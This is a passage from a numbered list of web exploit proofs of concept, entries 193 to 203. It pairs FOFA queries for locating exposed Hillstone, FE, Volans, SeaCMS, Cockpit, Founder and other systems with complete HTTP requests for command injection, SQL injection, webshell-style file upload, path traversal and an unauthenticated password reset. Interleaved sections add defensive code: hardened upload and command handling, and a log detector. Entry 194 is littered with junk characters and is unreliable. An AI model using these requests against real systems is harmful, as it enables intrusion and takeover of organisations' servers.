User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}


193. 山石网科 (Hillstone) 云鉴 security management system setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
Fetch a CSRF token, reusing the same PHPSESSID cookie in every request:
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Replace {{token}} with the value returned above; the command writes a marker file under the web root:
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Confirm the marker is served:
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0


8 G7 {- X5 l7 w6 X194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传( s$ ~5 `" G: E. M
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在& r3 ?+ y$ Y3 W* @/ E! n$ o

, M" ]0 X( f9 ~7 zPOST /servlet/uploadAttachmentServlet HTTP/1.16 q6 l; |0 c! Y% c; I: g# M
Host: host! [+ G  N4 p" s$ E: a# d3 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.362 ?! J4 s: F1 T, w! A/ Y# Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 w  }- v" O' ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ S; X' g! s/ |& ~7 GAccept-Encoding: gzip, deflate
( I: A4 D6 W. g. cConnection: close
% o6 |  d- i" U& uContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk8 a6 I: e1 k/ R4 E) S" U
------WebKitFormBoundaryKNt0t4vBe8cX9rZk5 P" K# Y2 J# x" B3 F& P

) Z6 V4 i4 h* z6 v4 w. b  `( t1 {Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
4 w( b. K/ A: b# ^6 K9 K' QContent-Type: text/plain' [% U  z$ ?5 [& h6 p
<% out.println("hello");%>
/ \# |/ h6 t' H& f' O------WebKitFormBoundaryKNt0t4vBe8cX9rZk2 S' y0 j" V- g( G
Content-Disposition: form-data; name="json"
+ A1 B/ L9 C' H {"iq":{"query":{"UpdateType":"mail"}}}
+ w0 U5 z$ O4 o9 M; ~* x* m------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
, o* k( t5 q! T4 P; l* A6 o
! K4 d6 w- q& V4 V/ j1 |
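The upload entries above (192, 194, and 199, 202, 203 further down) share one defect: the server trusts the client-supplied filename and Content-Type. The following is an added example, not code from any of the products listed; it puts a handler with that defect next to a hardened one. The function names, the extension allowlist and the sample uploads are assumptions for illustration.

```python
# Added example (not code from FE, 富通天下, Cockpit, 微擎 or 红海云): the upload-handling
# defect behind entries 192, 194, 199, 202 and 203 next to a hardened handler.
# Function names, the allowlist and the sample uploads below are assumptions.
import os
import secrets
import tempfile

# Extension -> accepted leading bytes. Anything else is never written to disk.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".pdf": (b"%PDF-",),
}
# Server-executable suffixes from the PoCs above; rejected even as an inner extension (x.jsp.jpg).
DANGEROUS = {".jsp", ".jspx", ".php", ".phtml", ".ashx", ".asp", ".aspx"}


def save_upload_vulnerable(upload_dir: str, filename: str, data: bytes) -> str:
    """Trusts the client filename, as entry 194 shows: '../' segments leave upload_dir
    and the extension decides how the server will later interpret the file."""
    dest = os.path.join(upload_dir, filename)
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    with open(dest, "wb") as fh:
        fh.write(data)
    return os.path.normpath(dest)


def save_upload_hardened(upload_dir: str, filename: str, data: bytes, claimed_type: str) -> str:
    """Rejects path separators, allowlists the extension, checks the body against the
    magic bytes for that extension (the client's Content-Type, like entry 203's
    'image/jpeg' on a JSP, is ignored) and stores under a server-generated name."""
    if any(c in filename for c in "/\\\x00"):
        raise ValueError("path separator or NUL in filename")
    stem, ext = os.path.splitext(filename)
    ext = ext.lower()
    if ext not in ALLOWED:
        raise ValueError(f"extension {ext!r} not allowed")
    if any("." + part.lower() in DANGEROUS for part in stem.split(".")):
        raise ValueError("dangerous inner extension")
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        raise ValueError(f"body is not {ext}; client claimed {claimed_type}")
    root = os.path.realpath(upload_dir)
    dest = os.path.join(root, secrets.token_hex(16) + ext)
    if not os.path.realpath(dest).startswith(root + os.sep):
        raise ValueError("destination escaped upload directory")  # defence in depth
    with open(dest, "wb") as fh:
        fh.write(data)
    return dest


def demo() -> dict:
    """Runs both handlers against constructed uploads modelled on the PoCs above."""
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, "uploads")
    os.makedirs(uploads)
    results = {}
    traversal = "../webapps/ROOT/hello.jsp"  # entry 194 style filename
    written = save_upload_vulnerable(uploads, traversal, b'<% out.println("hello"); %>')
    results["vulnerable_escaped_upload_dir"] = not written.startswith(uploads + os.sep)
    cases = [
        ("traversal", traversal, b"<% %>", "text/plain"),
        ("11.jsp", "11.jsp", b'<% out.print("hello,eHR");%>', "image/jpeg"),  # entry 203
        ("shell.jsp.jpg", "shell.jsp.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16, "image/jpeg"),
        ("photo.jpg", "photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16, "image/jpeg"),
    ]
    for label, name, body, ctype in cases:
        try:
            save_upload_hardened(uploads, name, body, ctype)
            results[label] = "stored"
        except ValueError as exc:
            results[label] = "rejected: " + str(exc)
    return results
```

demo() shows the vulnerable handler writing hello.jsp outside the upload directory, while the hardened one rejects the traversal name, the JSP labelled image/jpeg and the double extension, and stores only the genuine JPEG under a random name.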
195. 飞鱼星 (Volans) internet behaviour management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}


196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}


197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

111*111 evaluates to 12321; its appearance in the response shows the injected SELECT was executed.


198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

The sid value URL-decodes to a backtick-quoted ls />/www/aaa.txt, so the shell runs ls and writes the listing under the web root; the request is sent with a LuCI sysauth session cookie.


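Entries 195 and 198 both inject into a command line: a ';' in the JSON name field starts a second command, and backticks in sid substitute a command's output. The following is an added example, not code from 飞鱼星 or aliyundrive-webdav; it shows the vulnerable construction next to the hardened one. The 'echo order:' command stands in for whatever the real CGI runs, and NAME_RE is an assumed allowlist for an order or device name.

```python
# Added example (not code from 飞鱼星 or aliyundrive-webdav): the command-construction
# defect behind entries 195 and 198 next to a hardened version. 'echo order:' stands in
# for whatever the real CGI runs; NAME_RE is an assumed allowlist for an order/device name.
import re
import subprocess

NAME_RE = re.compile(r"\A[A-Za-z0-9_.-]{1,64}\Z")


def run_order_vulnerable(name: str) -> str:
    """Concatenates the value into a shell command line. ';' (entry 195) starts a new
    command and backticks (entry 198) substitute a command's output into the line."""
    proc = subprocess.run("echo order:" + name, shell=True, capture_output=True, text=True)
    return proc.stdout


def hardened_accepts(name: str) -> bool:
    """Allowlist check: only characters that can never carry meaning for a shell."""
    return NAME_RE.match(name) is not None


def run_order_hardened(name: str) -> str:
    """Validates, then passes the value as one argv element with no shell involved,
    so even a value that slipped past the allowlist could not become a second command."""
    if not hardened_accepts(name):
        raise ValueError(f"rejected name: {name!r}")
    proc = subprocess.run(["echo", "order:" + name], capture_output=True, text=True, check=True)
    return proc.stdout
```

run_order_vulnerable(";echo INJECTED;echo ") returns three lines because the shell ran three commands, and run_order_vulnerable("`echo INJECTED`") returns "order:INJECTED" because the backticks were expanded; hardened_accepts() rejects both payloads before any process is started.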
199. Cockpit assetsmanager/upload endpoint file upload
Fofa:title="Authenticate Please!"
Run the PoC in order: fetch the csfr token, obtain a session cookie, upload, then fetch the result.

1. Request the login page to obtain the csfr token:
GET /auth/login?to=/ HTTP/1.1

Response: 200, body contains csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Log in with the token from step 1 (the PoC uses admin/admin) to obtain a session cookie:
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with that session cookie:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

4. The uploaded file is reachable at:
/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


201. 方正 (Founder) all-media news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1


202. 微擎 (WeEngine) system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Fetch the form to obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.36
Content-Length: 0

Substitute those __VIEWSTATE and __EVENTVALIDATION values into the upload request:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is served at:
/_data/Uploads/1123.txt

203. 红海云 EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
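The introduction asks defenders to use this list for a risk check. The following is an added example, not part of the original list: an access-log sweep whose endpoint watchlist and payload patterns are taken from the request lines of entries 185 to 203 above. Only the request line is available in a web server log, so payloads that travel in a POST body (186, 187, 190, 191, 193, 195, 196, 201 and the uploads) can only be caught here by endpoint, not by payload; that needs a WAF or request-body logging. The sample log lines are constructed; the watchlist paths and labels are assumptions drawn from the entries.

```python
# Added example (not part of the original list): access-log sweep keyed to entries 185-203.
# Sample log lines are constructed; watchlist paths come from the request lines above.
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# Combined/common log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Normalised path -> entry. Keys carry no trailing slash and no ';' path parameters.
WATCHED_PATHS = {
    "/admin/pr_monitor/getting_index_data.php": "186 DataCube3 SQLi",
    "/index.cfm/_api/json/v1/default": "187 Mura CMS processAsyncObject SQLi",
    "/attachment": "188 佳会 attachment file read",
    "/xds/deleteStudy.php": "189 LANWON deleteStudy SQLi",
    "/index.php/admin/Userinfo/poihuoqu": "190 poihuoqu file read",
    "/CDGServer3/NavigationAjax": "191 亿赛通 NavigationAjax SQLi",
    "/JoinfApp/EMail/UploadEmailAttr": "192 富通天下 UploadEmailAttr upload",
    "/master/ajaxActions/setSystemTimeAction.php": "193 山石云鉴 setSystemTimeAction RCE",
    "/servlet/uploadAttachmentServlet": "194 FE uploadAttachmentServlet upload",
    "/send_order.cgi": "195 飞鱼星 send_order.cgi RCE",
    "/cas/userCtl/resetPasswordBySuper": "196 风速科技 password reset",
    "/entsoft/Quotegask_editAction.entweb": "197 浙大恩特 Quotegask_editAction SQLi",
    "/cgi-bin/luci/admin/services/aliyundrive-webdav/query": "198 aliyundrive-webdav RCE",
    "/assetsmanager/upload": "199 Cockpit assetsmanager upload",
    "/js/player/dmplayer/dmku": "200 SeaCMS dmku SQLi",
    "/newsedit/newsplan/task/binary.do": "201 方正 binary.do SQLi",
    "/User/AccountEdit.aspx": "202 微擎 AccountEdit upload",
    "/RedseaPlatform/PtFjk.mob": "203 红海云 PtFjk upload",
}

# Payload shapes visible in the decoded request target.
PAYLOAD_PATTERNS = [
    (re.compile(r"waitfor\s+delay", re.I), "MSSQL time-based SQLi (189, 191, 201)"),
    (re.compile(r"\bsleep\s*\(", re.I), "MySQL time-based SQLi (187, 200)"),
    (re.compile(r"randomblob\s*\(", re.I), "SQLite heavy-query SQLi (186)"),
    (re.compile(r"union\s+(all\s+)?select", re.I), "UNION SQLi (197, 201)"),
    (re.compile(r"into\s+outfile", re.I), "SQL file write (185)"),
    (re.compile(r"file:///|/etc/passwd"), "local file read (188, 190)"),
    (re.compile(r"`|\$\("), "shell command substitution (198)"),
]
# Locations the PoCs above write to and then fetch.
DROPPED_FILE_RE = re.compile(r"^/(storage/uploads/|_data/Uploads/|master/img/config$)")


def normalize_target(target: str):
    """Decode the path, strip ';param' suffixes (the ';.js' trick in 197) and resolve
    '.' and '..' (the '/js/../' in 191); return (path, decoded query)."""
    parts = urlsplit(target)
    segments = []
    for seg in unquote(parts.path).split("/"):
        seg = seg.split(";", 1)[0]
        if seg == "..":
            if segments:
                segments.pop()
        elif seg not in ("", "."):
            segments.append(seg)
    return "/" + "/".join(segments), unquote_plus(parts.query)


def scan_log(text: str) -> list:
    """Return one finding per request line that hits a watched endpoint, a payload
    pattern or a dropped-file location."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        path, query = normalize_target(m["target"])
        reasons = []
        if path in WATCHED_PATHS:
            reasons.append("endpoint: " + WATCHED_PATHS[path])
        decoded = path + ("?" + query if query else "")
        for rx, label in PAYLOAD_PATTERNS:
            if rx.search(decoded):
                reasons.append("payload: " + label)
        if DROPPED_FILE_RE.match(path):
            reasons.append("dropped file fetched (193, 199, 202)")
        if reasons:
            findings.append({"line": lineno, "ip": m["ip"], "method": m["method"],
                             "status": m["status"], "path": path, "reasons": reasons})
    return findings


# Constructed sample: a benign line, then requests shaped like entries 189, 191, 197, 198, 188, 199.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:10:00:01 +0800] "GET /index.php HTTP/1.1" 200 512
203.0.113.5 - - [10/May/2024:10:00:02 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 0
203.0.113.5 - - [10/May/2024:10:00:03 +0800] "POST /CDGServer3/js/../NavigationAjax HTTP/1.1" 200 12
203.0.113.5 - - [10/May/2024:10:00:04 +0800] "GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1" 200 40
203.0.113.5 - - [10/May/2024:10:00:05 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1" 200 2
203.0.113.5 - - [10/May/2024:10:00:06 +0800] "GET /attachment?file=/etc/passwd HTTP/1.1" 200 1843
203.0.113.5 - - [10/May/2024:10:00:07 +0800] "GET /storage/uploads/tttt.php HTTP/1.1" 200 4
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['method']} {f['path']} -> {'; '.join(f['reasons'])}")
```

Two details matter for a real log: path normalisation must strip ';' path parameters and resolve '..' before matching, otherwise the 197 and 191 requests never match their watchlist entries, and a 200 status on a dropped-file path (storage/uploads, _data/Uploads, master/img/config) means the upload already succeeded and the host should be treated as compromised rather than merely scanned.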